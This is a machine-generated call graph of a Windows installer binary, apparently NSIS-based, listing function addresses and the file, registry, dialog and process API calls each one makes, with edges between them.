3364 406aab 3365 401488 3364->3365 3398 406035 lstrcpynW 3364->3398 3365->3358 3382 406064 3365->3382 3367 4068ff GetVersion 3377 40690c 3367->3377 3368 406a72 lstrlenW 3368->3372 3370 406831 10 API calls 3370->3368 3372->3364 3372->3367 3372->3368 3372->3370 3375 406064 5 API calls 3372->3375 3396 405f7d wsprintfW 3372->3396 3397 406035 lstrcpynW 3372->3397 3374 40697e GetSystemDirectoryW 3374->3377 3375->3372 3376 406991 GetWindowsDirectoryW 3376->3377 3377->3372 3377->3374 3377->3376 3378 406831 10 API calls 3377->3378 3379 406a0b lstrcatW 3377->3379 3380 4069c5 SHGetSpecialFolderLocation 3377->3380 3391 405eff RegOpenKeyExW 3377->3391 3378->3377 3379->3372 3380->3377 3381 4069dd SHGetPathFromIDListW CoTaskMemFree 3380->3381 3381->3377 3389 406071 3382->3389 3383 4060e7 3384 4060ed CharPrevW 3383->3384 3386 40610d 3383->3386 3384->3383 3385 4060da CharNextW 3385->3383 3385->3389 3386->3358 3388 4060c6 CharNextW 3388->3389 3389->3383 3389->3385 3389->3388 3390 4060d5 CharNextW 3389->3390 3399 405d32 3389->3399 3390->3385 3392 405f33 RegQueryValueExW 3391->3392 3393 405f78 3391->3393 3394 405f55 RegCloseKey 3392->3394 3393->3377 3394->3393 3396->3372 3397->3372 3398->3365 3400 405d38 3399->3400 3401 405d4e 3400->3401 3402 405d3f CharNextW 3400->3402 3401->3389 3402->3400 3404 40613c 3403->3404 3405 40611f 3403->3405 3407 4061b3 3404->3407 3408 406159 3404->3408 3409 40277f WritePrivateProfileStringW 3404->3409 3406 406129 CloseHandle 3405->3406 3405->3409 3406->3409 3407->3409 3410 4061bc lstrcatW lstrlenW WriteFile 3407->3410 3408->3410 3411 406162 GetFileAttributesW 3408->3411 3410->3409 3416 405e7c GetFileAttributesW CreateFileW 3411->3416 3413 40617e 3413->3409 3414 4061a8 SetFilePointer 3413->3414 3415 40618e WriteFile 3413->3415 3414->3407 3415->3414 3416->3413 4846 402797 4847 40145c 18 API calls 4846->4847 4848 4027ae 4847->4848 4849 40145c 18 API calls 4848->4849 4850 4027b7 4849->4850 4851 40145c 18 API calls 4850->4851 4852 4027c0 GetPrivateProfileStringW lstrcmpW 4851->4852 4853 401e9a 4854 40145c 18 API calls 4853->4854 4855 401ea1 4854->4855 4856 401446 18 API calls 4855->4856 4857 401eab wsprintfW 4856->4857 3817 401a1f 3818 40145c 18 API calls 3817->3818 3819 401a26 3818->3819 3820 4062cf 11 API calls 3819->3820 3821 401a49 3820->3821 3822 401a64 3821->3822 3823 401a5c 3821->3823 3892 406035 lstrcpynW 3822->3892 3891 406035 lstrcpynW 3823->3891 3826 401a6f 3893 40674e lstrlenW CharPrevW 3826->3893 3827 401a62 3830 406064 5 API calls 3827->3830 3861 401a81 3830->3861 3831 406301 2 API calls 3831->3861 3834 401a98 CompareFileTime 3834->3861 3835 401ba9 3836 404f9e 25 API calls 3835->3836 3838 401bb3 3836->3838 3837 401b5d 3839 404f9e 25 API calls 3837->3839 3870 40337f 3838->3870 3841 401b70 3839->3841 3845 4062cf 11 API calls 3841->3845 3843 406035 lstrcpynW 3843->3861 3844 4062cf 11 API calls 3846 401bda 3844->3846 3850 401b8b 3845->3850 3847 401be9 SetFileTime 3846->3847 3848 401bf8 CloseHandle 3846->3848 3847->3848 3848->3850 3851 401c09 3848->3851 3849 406831 18 API calls 3849->3861 3852 401c21 3851->3852 3853 401c0e 3851->3853 3854 406831 18 API calls 3852->3854 3855 406831 18 API calls 3853->3855 3856 401c29 3854->3856 3858 401c16 lstrcatW 3855->3858 3859 4062cf 11 API calls 3856->3859 3858->3856 3862 401c34 3859->3862 3860 401b50 3864 401b93 3860->3864 3865 401b53 3860->3865 3861->3831 3861->3834 3861->3835 3861->3837 3861->3843 3861->3849 3861->3860 3863 4062cf 11 API calls 3861->3863 3869 405e7c GetFileAttributesW CreateFileW 3861->3869 3896 405e5c GetFileAttributesW 3861->3896 3899 405ccc 3861->3899 3866 405ccc MessageBoxIndirectW 3862->3866 3863->3861 3867 4062cf 11 API calls 3864->3867 3868 4062cf 11 API calls 3865->3868 3866->3850 3867->3850 3868->3837 3869->3861 3871 40339a 3870->3871 3872 4033c7 3871->3872 3905 403368 SetFilePointer 3871->3905 3903 403336 ReadFile 3872->3903 3876 401bc6 3876->3844 3877 403546 3879 40354a 3877->3879 3880 40356e 3877->3880 3878 4033eb GetTickCount 3878->3876 3883 403438 3878->3883 3881 403336 ReadFile 3879->3881 3880->3876 3884 403336 ReadFile 3880->3884 3885 40358d WriteFile 3880->3885 3881->3876 3882 403336 ReadFile 3882->3883 3883->3876 3883->3882 3887 40348a GetTickCount 3883->3887 3888 4034af MulDiv wsprintfW 3883->3888 3890 4034f3 WriteFile 3883->3890 3884->3880 3885->3876 3886 4035a1 3885->3886 3886->3876 3886->3880 3887->3883 3889 404f9e 25 API calls 3888->3889 3889->3883 3890->3876 3890->3883 3891->3827 3892->3826 3894 401a75 lstrcatW 3893->3894 3895 40676b lstrcatW 3893->3895 3894->3827 3895->3894 3897 405e79 3896->3897 3898 405e6b SetFileAttributesW 3896->3898 3897->3861 3898->3897 3900 405ce1 3899->3900 3901 405d2f 3900->3901 3902 405cf7 MessageBoxIndirectW 3900->3902 3901->3861 3902->3901 3904 403357 3903->3904 3904->3876 3904->3877 3904->3878 3905->3872 4858 40209f GetDlgItem GetClientRect 4859 40145c 18 API calls 4858->4859 4860 4020cf LoadImageW SendMessageW 4859->4860 4861 4030e3 4860->4861 4862 4020ed DeleteObject 4860->4862 4862->4861 4863 402b9f 4864 401446 18 API calls 4863->4864 4868 402ba7 4864->4868 4865 402c4a 4866 402bdf ReadFile 4866->4868 4875 402c3d 4866->4875 4867 401446 18 API calls 4867->4875 4868->4865 4868->4866 4869 402c06 MultiByteToWideChar 4868->4869 4870 402c3f 4868->4870 4871 402c4f 4868->4871 4868->4875 4869->4868 4869->4871 4876 405f7d wsprintfW 4870->4876 4873 402c6b SetFilePointer 4871->4873 4871->4875 4873->4875 4874 402d17 ReadFile 4874->4875 4875->4865 4875->4867 4875->4874 4876->4865 4877 402b23 GlobalAlloc 4878 402b39 4877->4878 4879 402b4b 4877->4879 4880 401446 18 API calls 4878->4880 4881 40145c 18 API calls 4879->4881 4883 402b41 4880->4883 4882 402b52 WideCharToMultiByte lstrlenA 4881->4882 4882->4883 4884 402b84 WriteFile 4883->4884 4885 402b93 4883->4885 4884->4885 4886 402384 GlobalFree 4884->4886 4886->4885 4888 4040a3 4889 4040b0 lstrcpynW lstrlenW 4888->4889 4890 4040ad 4888->4890 4890->4889 3430 4054a5 3431 4055f9 3430->3431 3432 4054bd 3430->3432 3434 40564a 3431->3434 3435 40560a GetDlgItem GetDlgItem 3431->3435 3432->3431 3433 4054c9 3432->3433 3437 4054d4 SetWindowPos 3433->3437 3438 4054e7 3433->3438 3436 4056a4 3434->3436 3444 40139d 80 API calls 3434->3444 3439 403d6b 19 API calls 3435->3439 3445 4055f4 3436->3445 3500 403ddb 3436->3500 3437->3438 3441 405504 3438->3441 3442 4054ec ShowWindow 3438->3442 3443 405634 SetClassLongW 3439->3443 3446 405526 3441->3446 3447 40550c DestroyWindow 3441->3447 3442->3441 3448 40141d 80 API calls 3443->3448 3451 40567c 3444->3451 3449 40552b SetWindowLongW 3446->3449 3450 40553c 3446->3450 3452 405908 3447->3452 3448->3434 3449->3445 3453 4055e5 3450->3453 3454 405548 GetDlgItem 3450->3454 3451->3436 3455 405680 SendMessageW 3451->3455 3452->3445 3461 405939 ShowWindow 3452->3461 3520 403df6 3453->3520 3458 405578 3454->3458 3459 40555b SendMessageW IsWindowEnabled 3454->3459 3455->3445 3456 40141d 80 API calls 3469 4056b6 3456->3469 3457 40590a DestroyWindow KiUserCallbackDispatcher 3457->3452 3463 405585 3458->3463 3466 4055cc SendMessageW 3458->3466 3467 405598 3458->3467 3475 40557d 3458->3475 3459->3445 3459->3458 3461->3445 3462 406831 18 API calls 3462->3469 3463->3466 3463->3475 3465 403d6b 19 API calls 3465->3469 3466->3453 3470 4055a0 3467->3470 3471 4055b5 3467->3471 3468 4055b3 3468->3453 3469->3445 3469->3456 3469->3457 3469->3462 3469->3465 3491 40584a DestroyWindow 3469->3491 3503 403d6b 3469->3503 3514 40141d 3470->3514 3472 40141d 80 API calls 3471->3472 3474 4055bc 3472->3474 3474->3453 3474->3475 3517 403d44 3475->3517 3477 405731 GetDlgItem 3478 405746 3477->3478 3479 40574f ShowWindow KiUserCallbackDispatcher 3477->3479 3478->3479 3506 403db1 KiUserCallbackDispatcher 3479->3506 3481 405779 EnableWindow 3484 40578d 3481->3484 3482 405792 GetSystemMenu EnableMenuItem SendMessageW 3483 4057c2 SendMessageW 3482->3483 3482->3484 3483->3484 3484->3482 3507 403dc4 SendMessageW 3484->3507 3508 406035 lstrcpynW 3484->3508 3487 4057f0 lstrlenW 3488 406831 18 API calls 3487->3488 3489 405806 SetWindowTextW 3488->3489 3509 40139d 3489->3509 3491->3452 3492 405864 CreateDialogParamW 3491->3492 3492->3452 3493 405897 3492->3493 3494 403d6b 19 API calls 3493->3494 3495 4058a2 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3494->3495 3496 40139d 80 API calls 3495->3496 3497 4058e8 3496->3497 3497->3445 3498 4058f0 ShowWindow 3497->3498 3499 403ddb SendMessageW 3498->3499 3499->3452 3501 403df3 3500->3501 3502 403de4 SendMessageW 3500->3502 3501->3469 3502->3501 3504 406831 18 API calls 3503->3504 3505 403d76 SetDlgItemTextW 3504->3505 3505->3477 3506->3481 3507->3484 3508->3487 3512 4013a4 3509->3512 3510 401410 3510->3469 3512->3510 3513 4013dd MulDiv SendMessageW 3512->3513 3534 4015a0 3512->3534 3513->3512 3515 40139d 80 API calls 3514->3515 3516 401432 3515->3516 3516->3475 3518 403d51 SendMessageW 3517->3518 3519 403d4b 3517->3519 3518->3468 3519->3518 3521 403e0b GetWindowLongW 3520->3521 3531 403e94 3520->3531 3522 403e1c 3521->3522 3521->3531 3523 403e2b GetSysColor 3522->3523 3524 403e2e 3522->3524 3523->3524 3525 403e34 SetTextColor 3524->3525 3526 403e3e SetBkMode 3524->3526 3525->3526 3527 403e56 GetSysColor 3526->3527 3528 403e5c 3526->3528 3527->3528 3529 403e63 SetBkColor 3528->3529 3530 403e6d 3528->3530 3529->3530 3530->3531 3532 403e80 DeleteObject 3530->3532 3533 403e87 CreateBrushIndirect 3530->3533 3531->3445 3532->3533 3533->3531 3535 4015fa 3534->3535 3614 40160c 3534->3614 3536 401601 3535->3536 3537 401742 3535->3537 3538 401962 3535->3538 3539 4019ca 3535->3539 3540 40176e 3535->3540 3541 401650 3535->3541 3542 4017b1 3535->3542 3543 401672 3535->3543 3544 401693 3535->3544 3545 401616 3535->3545 3546 4016d6 3535->3546 3547 401736 3535->3547 3548 401897 3535->3548 3549 4018db 3535->3549 3550 40163c 3535->3550 3551 4016bd 3535->3551 3535->3614 3560 4062cf 11 API calls 3536->3560 3552 401751 ShowWindow 3537->3552 3553 401758 3537->3553 3557 40145c 18 API calls 3538->3557 3564 40145c 18 API calls 3539->3564 3554 40145c 18 API calls 3540->3554 3578 4062cf 11 API calls 3541->3578 3558 40145c 18 API calls 3542->3558 3555 40145c 18 API calls 3543->3555 3559 401446 18 API calls 3544->3559 3563 40145c 18 API calls 3545->3563 3577 401446 18 API calls 3546->3577 3546->3614 3547->3614 3668 405f7d wsprintfW 3547->3668 3556 40145c 18 API calls 3548->3556 3561 40145c 18 API calls 3549->3561 3565 401647 PostQuitMessage 3550->3565 3550->3614 3562 4062cf 11 API calls 3551->3562 3552->3553 3566 401765 ShowWindow 3553->3566 3553->3614 3567 401775 3554->3567 3568 401678 3555->3568 3569 40189d 3556->3569 3570 401968 GetFullPathNameW 3557->3570 3571 4017b8 3558->3571 3572 40169a 3559->3572 3560->3614 3573 4018e2 3561->3573 3574 4016c7 SetForegroundWindow 3562->3574 3575 40161c 3563->3575 3576 4019d1 SearchPathW 3564->3576 3565->3614 3566->3614 3580 4062cf 11 API calls 3567->3580 3581 4062cf 11 API calls 3568->3581 3659 406301 FindFirstFileW 3569->3659 3583 4019a1 3570->3583 3584 40197f 3570->3584 3585 4062cf 11 API calls 3571->3585 3586 4062cf 11 API calls 3572->3586 3587 40145c 18 API calls 3573->3587 3574->3614 3588 4062cf 11 API calls 3575->3588 3576->3547 3576->3614 3577->3614 3589 401664 3578->3589 3590 401785 SetFileAttributesW 3580->3590 3591 401683 3581->3591 3603 4019b8 GetShortPathNameW 3583->3603 3583->3614 3584->3583 3609 406301 2 API calls 3584->3609 3593 4017c9 3585->3593 3594 4016a7 Sleep 3586->3594 3595 4018eb 3587->3595 3596 401627 3588->3596 3597 40139d 65 API calls 3589->3597 3598 40179a 3590->3598 3590->3614 3607 404f9e 25 API calls 3591->3607 3641 405d85 CharNextW CharNextW 3593->3641 3594->3614 3604 40145c 18 API calls 3595->3604 3605 404f9e 25 API calls 3596->3605 3597->3614 3606 4062cf 11 API calls 3598->3606 3599 4018c2 3610 4062cf 11 API calls 3599->3610 3600 4018a9 3608 4062cf 11 API calls 3600->3608 3603->3614 3612 4018f5 3604->3612 3605->3614 3606->3614 3607->3614 3608->3614 3613 401991 3609->3613 3610->3614 3611 4017d4 3615 401864 3611->3615 3618 405d32 CharNextW 3611->3618 3636 4062cf 11 API calls 3611->3636 3616 4062cf 11 API calls 3612->3616 3613->3583 3667 406035 lstrcpynW 3613->3667 3614->3512 3615->3591 3617 40186e 3615->3617 3619 401902 MoveFileW 3616->3619 3647 404f9e 3617->3647 3622 4017e6 CreateDirectoryW 3618->3622 3623 401912 3619->3623 3624 40191e 3619->3624 3622->3611 3626 4017fe GetLastError 3622->3626 3623->3591 3630 406301 2 API calls 3624->3630 3640 401942 3624->3640 3628 401827 GetFileAttributesW 3626->3628 3629 40180b GetLastError 3626->3629 3628->3611 3633 4062cf 11 API calls 3629->3633 3634 401929 3630->3634 3631 401882 SetCurrentDirectoryW 3631->3614 3632 4062cf 11 API calls 3635 40195c 3632->3635 3633->3611 3634->3640 3662 406c94 3634->3662 3635->3614 3636->3611 3639 404f9e 25 API calls 3639->3640 3640->3632 3642 405da2 3641->3642 3645 405db4 3641->3645 3644 405daf CharNextW 3642->3644 3642->3645 3643 405dd8 3643->3611 3644->3643 3645->3643 3646 405d32 CharNextW 3645->3646 3646->3645 3648 404fb7 3647->3648 3649 401875 3647->3649 3650 404fd5 lstrlenW 3648->3650 3651 406831 18 API calls 3648->3651 3658 406035 lstrcpynW 3649->3658 3652 404fe3 lstrlenW 3650->3652 3653 404ffe 3650->3653 3651->3650 3652->3649 3654 404ff5 lstrcatW 3652->3654 3655 405011 3653->3655 3656 405004 SetWindowTextW 3653->3656 3654->3653 3655->3649 3657 405017 SendMessageW SendMessageW SendMessageW 3655->3657 3656->3655 3657->3649 3658->3631 3660 4018a5 3659->3660 3661 406317 FindClose 3659->3661 3660->3599 3660->3600 3661->3660 3669 406328 GetModuleHandleA 3662->3669 3666 401936 3666->3639 3667->3583 3668->3614 3670 406340 LoadLibraryA 3669->3670 3671 40634b GetProcAddress 3669->3671 3670->3671 3672 406359 3670->3672 3671->3672 3672->3666 3673 406ac5 lstrcpyW 3672->3673 3674 406b13 GetShortPathNameW 3673->3674 3675 406aea 3673->3675 3676 406b2c 3674->3676 3677 406c8e 3674->3677 3699 405e7c GetFileAttributesW CreateFileW 3675->3699 3676->3677 3680 406b34 WideCharToMultiByte 3676->3680 3677->3666 3679 406af3 CloseHandle GetShortPathNameW 3679->3677 3681 406b0b 3679->3681 3680->3677 3682 406b51 WideCharToMultiByte 3680->3682 3681->3674 3681->3677 3682->3677 3683 406b69 wsprintfA 3682->3683 3684 406831 18 API calls 3683->3684 3685 406b95 3684->3685 3700 405e7c GetFileAttributesW CreateFileW 3685->3700 3687 406ba2 3687->3677 3688 406baf GetFileSize GlobalAlloc 3687->3688 3689 406bd0 ReadFile 3688->3689 3690 406c84 CloseHandle 3688->3690 3689->3690 3691 406bea 3689->3691 3690->3677 3691->3690 3701 405de2 lstrlenA 3691->3701 3694 406c03 lstrcpyA 3697 406c25 3694->3697 3695 406c17 3696 405de2 4 API calls 3695->3696 3696->3697 3698 406c5c SetFilePointer WriteFile GlobalFree 3697->3698 3698->3690 3699->3679 3700->3687 3702 405e23 lstrlenA 3701->3702 3703 405e2b 3702->3703 3704 405dfc lstrcmpiA 3702->3704 3703->3694 3703->3695 3704->3703 3705 405e1a CharNextA 3704->3705 3705->3702 4891 402da5 4892 4030e3 4891->4892 4893 402dac 4891->4893 4894 401446 18 API calls 4893->4894 4895 402db8 4894->4895 4896 402dbf SetFilePointer 4895->4896 4896->4892 4897 402dcf 4896->4897 4897->4892 4899 405f7d wsprintfW 4897->4899 4899->4892 4900 4049a8 GetDlgItem GetDlgItem 4901 4049fe 7 API calls 4900->4901 4906 404c16 4900->4906 4902 404aa2 DeleteObject 4901->4902 4903 404a96 SendMessageW 4901->4903 4904 404aad 4902->4904 4903->4902 4907 404ae4 4904->4907 4910 406831 18 API calls 4904->4910 4905 404cfb 4908 404da0 4905->4908 4909 404c09 4905->4909 4914 404d4a SendMessageW 4905->4914 4906->4905 4918 40487a 5 API calls 4906->4918 4931 404c86 4906->4931 4913 403d6b 19 API calls 4907->4913 4911 404db5 4908->4911 4912 404da9 SendMessageW 4908->4912 4915 403df6 8 API calls 4909->4915 4916 404ac6 SendMessageW SendMessageW 4910->4916 4923 404dc7 ImageList_Destroy 4911->4923 4924 404dce 4911->4924 4929 404dde 4911->4929 4912->4911 4919 404af8 4913->4919 4914->4909 4921 404d5f SendMessageW 4914->4921 4922 404f97 4915->4922 4916->4904 4917 404ced SendMessageW 4917->4905 4918->4931 4925 403d6b 19 API calls 4919->4925 4920 404f48 4920->4909 4930 404f5d ShowWindow GetDlgItem ShowWindow 4920->4930 4926 404d72 4921->4926 4923->4924 4927 404dd7 GlobalFree 4924->4927 4924->4929 4933 404b09 4925->4933 4935 404d83 SendMessageW 4926->4935 4927->4929 4928 404bd6 GetWindowLongW SetWindowLongW 4932 404bf0 4928->4932 4929->4920 4934 40141d 80 API calls 4929->4934 4944 404e10 4929->4944 4930->4909 4931->4905 4931->4917 4936 404bf6 ShowWindow 4932->4936 4937 404c0e 4932->4937 4933->4928 4939 404b65 SendMessageW 4933->4939 4940 404bd0 4933->4940 4942 404b93 SendMessageW 4933->4942 4943 404ba7 SendMessageW 4933->4943 4934->4944 4935->4908 4951 403dc4 SendMessageW 4936->4951 4952 403dc4 SendMessageW 4937->4952 4939->4933 4940->4928 4940->4932 4942->4933 4943->4933 4945 404e54 4944->4945 4948 404e3e SendMessageW 4944->4948 4946 404f1f InvalidateRect 4945->4946 4950 404ecd SendMessageW SendMessageW 4945->4950 4946->4920 4947 404f35 4946->4947 4949 4043d9 21 API calls 4947->4949 4948->4945 4949->4920 4950->4945 4951->4909 4952->4906 4953 4030a9 SendMessageW 4954 4030c2 InvalidateRect 4953->4954 4955 4030e3 4953->4955 4954->4955 3906 4038af #17 SetErrorMode OleInitialize 3907 406328 3 API calls 3906->3907 3908 4038f2 SHGetFileInfoW 3907->3908 3980 406035 lstrcpynW 3908->3980 3910 40391d GetCommandLineW 3981 406035 lstrcpynW 3910->3981 3912 40392f GetModuleHandleW 3913 403947 3912->3913 3914 405d32 CharNextW 3913->3914 3915 403956 CharNextW 3914->3915 3926 403968 3915->3926 3916 403a02 3917 403a21 GetTempPathW 3916->3917 3982 4037f8 3917->3982 3919 403a37 3921 403a3b GetWindowsDirectoryW lstrcatW 3919->3921 3922 403a5f DeleteFileW 3919->3922 3920 405d32 CharNextW 3920->3926 3924 4037f8 11 API calls 3921->3924 3990 4035b3 GetTickCount GetModuleFileNameW 3922->3990 3927 403a57 3924->3927 3925 403a73 3928 403af8 3925->3928 3930 405d32 CharNextW 3925->3930 3966 403add 3925->3966 3926->3916 3926->3920 3933 403a04 3926->3933 3927->3922 3927->3928 4075 403885 3928->4075 3934 403a8a 3930->3934 4082 406035 lstrcpynW 3933->4082 3945 403b23 lstrcatW lstrcmpiW 3934->3945 3946 403ab5 3934->3946 3935 403aed 3938 406113 9 API calls 3935->3938 3936 403bfa 3939 403c7d 3936->3939 3941 406328 3 API calls 3936->3941 3937 403b0d 3940 405ccc MessageBoxIndirectW 3937->3940 3938->3928 3942 403b1b ExitProcess 3940->3942 3944 403c09 3941->3944 3948 406328 3 API calls 3944->3948 3945->3928 3947 403b3f CreateDirectoryW SetCurrentDirectoryW 3945->3947 4083 4067aa 3946->4083 3950 403b62 3947->3950 3951 403b57 3947->3951 3952 403c12 3948->3952 4100 406035 lstrcpynW 3950->4100 4099 406035 lstrcpynW 3951->4099 3956 406328 3 API calls 3952->3956 3959 403c1b 3956->3959 3958 403b70 4101 406035 lstrcpynW 3958->4101 3960 403c69 ExitWindowsEx 3959->3960 3965 403c29 GetCurrentProcess 3959->3965 3960->3939 3964 403c76 3960->3964 3961 403ad2 4098 406035 lstrcpynW 3961->4098 3967 40141d 80 API calls 3964->3967 3969 403c39 3965->3969 4018 405958 3966->4018 3967->3939 3968 406831 18 API calls 3970 403b98 DeleteFileW 3968->3970 3969->3960 3971 403ba5 CopyFileW 3970->3971 3977 403b7f 3970->3977 3971->3977 3972 403bee 3973 406c94 42 API calls 3972->3973 3975 403bf5 3973->3975 3974 406c94 42 API calls 3974->3977 3975->3928 3976 406831 18 API calls 3976->3977 3977->3968 3977->3972 3977->3974 3977->3976 3979 403bd9 CloseHandle 3977->3979 4102 405c6b CreateProcessW 3977->4102 3979->3977 3980->3910 3981->3912 3983 406064 5 API calls 3982->3983 3984 403804 3983->3984 3985 40380e 3984->3985 3986 40674e 3 API calls 3984->3986 3985->3919 3987 403816 CreateDirectoryW 3986->3987 3988 405eab 2 API calls 3987->3988 3989 40382a 3988->3989 3989->3919 4105 405e7c GetFileAttributesW CreateFileW 3990->4105 3992 4035f3 4012 403603 3992->4012 4106 406035 lstrcpynW 3992->4106 3994 403619 4107 40677d lstrlenW 3994->4107 3998 40362a GetFileSize 3999 403726 3998->3999 4013 403641 3998->4013 4112 4032d2 3999->4112 4001 40372f 4003 40376b GlobalAlloc 4001->4003 4001->4012 4124 403368 SetFilePointer 4001->4124 4002 403336 ReadFile 4002->4013 4123 403368 SetFilePointer 4003->4123 4006 4037e9 4009 4032d2 6 API calls 4006->4009 4007 403786 4010 40337f 33 API calls 4007->4010 4008 40374c 4011 403336 ReadFile 4008->4011 4009->4012 4016 403792 4010->4016 4015 403757 4011->4015 4012->3925 4013->3999 4013->4002 4013->4006 4013->4012 4014 4032d2 6 API calls 4013->4014 4014->4013 4015->4003 4015->4012 4016->4012 4016->4016 4017 4037c0 SetFilePointer 4016->4017 4017->4012 4019 406328 3 API calls 4018->4019 4020 40596c 4019->4020 4021 405972 4020->4021 4022 405984 4020->4022 4138 405f7d wsprintfW 4021->4138 4023 405eff 3 API calls 4022->4023 4024 4059b5 4023->4024 4026 4059d4 lstrcatW 4024->4026 4028 405eff 3 API calls 4024->4028 4027 405982 4026->4027 4129 403ec1 4027->4129 4028->4026 4031 4067aa 18 API calls 4032 405a06 4031->4032 4033 405a9c 4032->4033 4035 405eff 3 API calls 4032->4035 4034 4067aa 18 API calls 4033->4034 4036 405aa2 4034->4036 4037 405a38 4035->4037 4038 405ab2 4036->4038 4039 406831 18 API calls 4036->4039 4037->4033 4041 405a5b lstrlenW 4037->4041 4044 405d32 CharNextW 4037->4044 4040 405ad2 LoadImageW 4038->4040 4140 403ea0 4038->4140 4039->4038 4042 405b92 4040->4042 4043 405afd RegisterClassW 4040->4043 4045 405a69 lstrcmpiW 4041->4045 4046 405a8f 4041->4046 4050 40141d 80 API calls 4042->4050 4048 405b9c 4043->4048 4049 405b45 SystemParametersInfoW CreateWindowExW 4043->4049 4051 405a56 4044->4051 4045->4046 4052 405a79 GetFileAttributesW 4045->4052 4054 40674e 3 API calls 4046->4054 4048->3935 4049->4042 4055 405b98 4050->4055 4051->4041 4056 405a85 4052->4056 4053 405ac8 4053->4040 4057 405a95 4054->4057 4055->4048 4058 403ec1 19 API calls 4055->4058 4056->4046 4059 40677d 2 API calls 4056->4059 4139 406035 lstrcpynW 4057->4139 4061 405ba9 4058->4061 4059->4046 4062 405bb5 ShowWindow LoadLibraryW 4061->4062 4063 405c38 4061->4063 4064 405bd4 LoadLibraryW 4062->4064 4065 405bdb GetClassInfoW 4062->4065 4066 405073 83 API calls 4063->4066 4064->4065 4067 405c05 DialogBoxParamW 4065->4067 4068 405bef GetClassInfoW RegisterClassW 4065->4068 4069 405c3e 4066->4069 4072 40141d 80 API calls 4067->4072 4068->4067 4070 405c42 4069->4070 4071 405c5a 4069->4071 4070->4048 4074 40141d 80 API calls 4070->4074 4073 40141d 80 API calls 4071->4073 4072->4048 4073->4048 4074->4048 4076 40389d 4075->4076 4077 40388f CloseHandle 4075->4077 4147 403caf 4076->4147 4077->4076 4082->3917 4200 406035 lstrcpynW 4083->4200 4085 4067bb 4086 405d85 4 API calls 4085->4086 4087 4067c1 4086->4087 4088 406064 5 API calls 4087->4088 4095 403ac3 4087->4095 4091 4067d1 4088->4091 4089 406809 lstrlenW 4090 406810 4089->4090 4089->4091 4093 40674e 3 API calls 4090->4093 4091->4089 4092 406301 2 API calls 4091->4092 4091->4095 4096 40677d 2 API calls 4091->4096 4092->4091 4094 406816 GetFileAttributesW 4093->4094 4094->4095 4095->3928 4097 406035 lstrcpynW 4095->4097 4096->4089 4097->3961 4098->3966 4099->3950 4100->3958 4101->3977 4103 405ca6 4102->4103 4104 405c9a CloseHandle 4102->4104 4103->3977 4104->4103 4105->3992 4106->3994 4108 40678c 4107->4108 4109 406792 CharPrevW 4108->4109 4110 40361f 4108->4110 4109->4108 4109->4110 4111 406035 lstrcpynW 4110->4111 4111->3998 4113 4032f3 4112->4113 4114 4032db 4112->4114 4117 403303 GetTickCount 4113->4117 4118 4032fb 4113->4118 4115 4032e4 DestroyWindow 4114->4115 4116 4032eb 4114->4116 4115->4116 4116->4001 4120 403311 CreateDialogParamW ShowWindow 4117->4120 4121 403334 4117->4121 4125 40635e 4118->4125 4120->4121 4121->4001 4123->4007 4124->4008 4126 40637b PeekMessageW 4125->4126 4127 406371 DispatchMessageW 4126->4127 4128 403301 4126->4128 4127->4126 4128->4001 4130 403ed5 4129->4130 4145 405f7d wsprintfW 4130->4145 4132 403f49 4133 406831 18 API calls 4132->4133 4134 403f55 SetWindowTextW 4133->4134 4135 403f70 4134->4135 4136 403f8b 4135->4136 4137 406831 18 API calls 4135->4137 4136->4031 4137->4135 4138->4027 4139->4033 4146 406035 lstrcpynW 4140->4146 4142 403eb4 4143 40674e 3 API calls 4142->4143 4144 403eba lstrcatW 4143->4144 4144->4053 4145->4132 4146->4142 4148 403cbd 4147->4148 4149 4038a2 4148->4149 4150 403cc2 FreeLibrary GlobalFree 4148->4150 4151 406cc7 4149->4151 4150->4149 4150->4150 4152 4067aa 18 API calls 4151->4152 4153 406cda 4152->4153 4154 406ce3 DeleteFileW 4153->4154 4155 406cfa 4153->4155 4194 4038ae CoUninitialize 4154->4194 4156 406e77 4155->4156 4198 406035 lstrcpynW 4155->4198 4162 406301 2 API calls 4156->4162 4182 406e84 4156->4182 4156->4194 4158 406d25 4159 406d39 4158->4159 4160 406d2f lstrcatW 4158->4160 4163 40677d 2 API calls 4159->4163 4161 406d3f 4160->4161 4165 406d4f lstrcatW 4161->4165 4167 406d57 lstrlenW FindFirstFileW 4161->4167 4164 406e90 4162->4164 4163->4161 4168 40674e 3 API calls 4164->4168 4164->4194 4165->4167 4166 4062cf 11 API calls 4166->4194 4171 406e67 4167->4171 4195 406d7e 4167->4195 4169 406e9a 4168->4169 4172 4062cf 11 API calls 4169->4172 4170 405d32 CharNextW 4170->4195 4171->4156 4173 406ea5 4172->4173 4174 405e5c 2 API calls 4173->4174 4175 406ead RemoveDirectoryW 4174->4175 4179 406ef0 4175->4179 4180 406eb9 4175->4180 4176 406e44 FindNextFileW 4178 406e5c FindClose 4176->4178 4176->4195 4178->4171 4181 404f9e 25 API calls 4179->4181 4180->4182 4183 406ebf 4180->4183 4181->4194 4182->4166 4185 4062cf 11 API calls 4183->4185 4184 4062cf 11 API calls 4184->4195 4186 406ec9 4185->4186 4189 404f9e 25 API calls 4186->4189 4187 406cc7 72 API calls 4187->4195 4188 405e5c 2 API calls 4190 406dfa DeleteFileW 4188->4190 4191 406ed3 4189->4191 4190->4195 4192 406c94 42 API calls 4191->4192 4192->4194 4193 404f9e 25 API calls 4193->4176 4194->3936 4194->3937 4195->4170 4195->4176 4195->4184 4195->4187 4195->4188 4195->4193 4196 404f9e 25 API calls 4195->4196 4197 406c94 42 API calls 4195->4197 4199 406035 lstrcpynW 4195->4199 4196->4195 4197->4195 4198->4158 4199->4195 4200->4085 4956 401cb2 4957 40145c 18 API calls 4956->4957 4958 401c54 4957->4958 4959 4062cf 11 API calls 4958->4959 4960 401c64 4958->4960 4961 401c59 4959->4961 4962 406cc7 81 API calls 4961->4962 4962->4960 3706 4021b5 3707 40145c 18 API calls 3706->3707 3708 4021bb 3707->3708 3709 40145c 18 API calls 3708->3709 3710 4021c4 3709->3710 3711 40145c 18 API calls 3710->3711 3712 4021cd 3711->3712 3713 40145c 18 API calls 3712->3713 3714 4021d6 3713->3714 3715 404f9e 25 API calls 3714->3715 3716 4021e2 ShellExecuteW 3715->3716 3717 40221b 3716->3717 3718 40220d 3716->3718 3719 4062cf 11 API calls 3717->3719 3720 4062cf 11 API calls 3718->3720 3721 402230 3719->3721 3720->3717 4963 402238 4964 40145c 18 API calls 4963->4964 4965 40223e 4964->4965 4966 4062cf 11 API calls 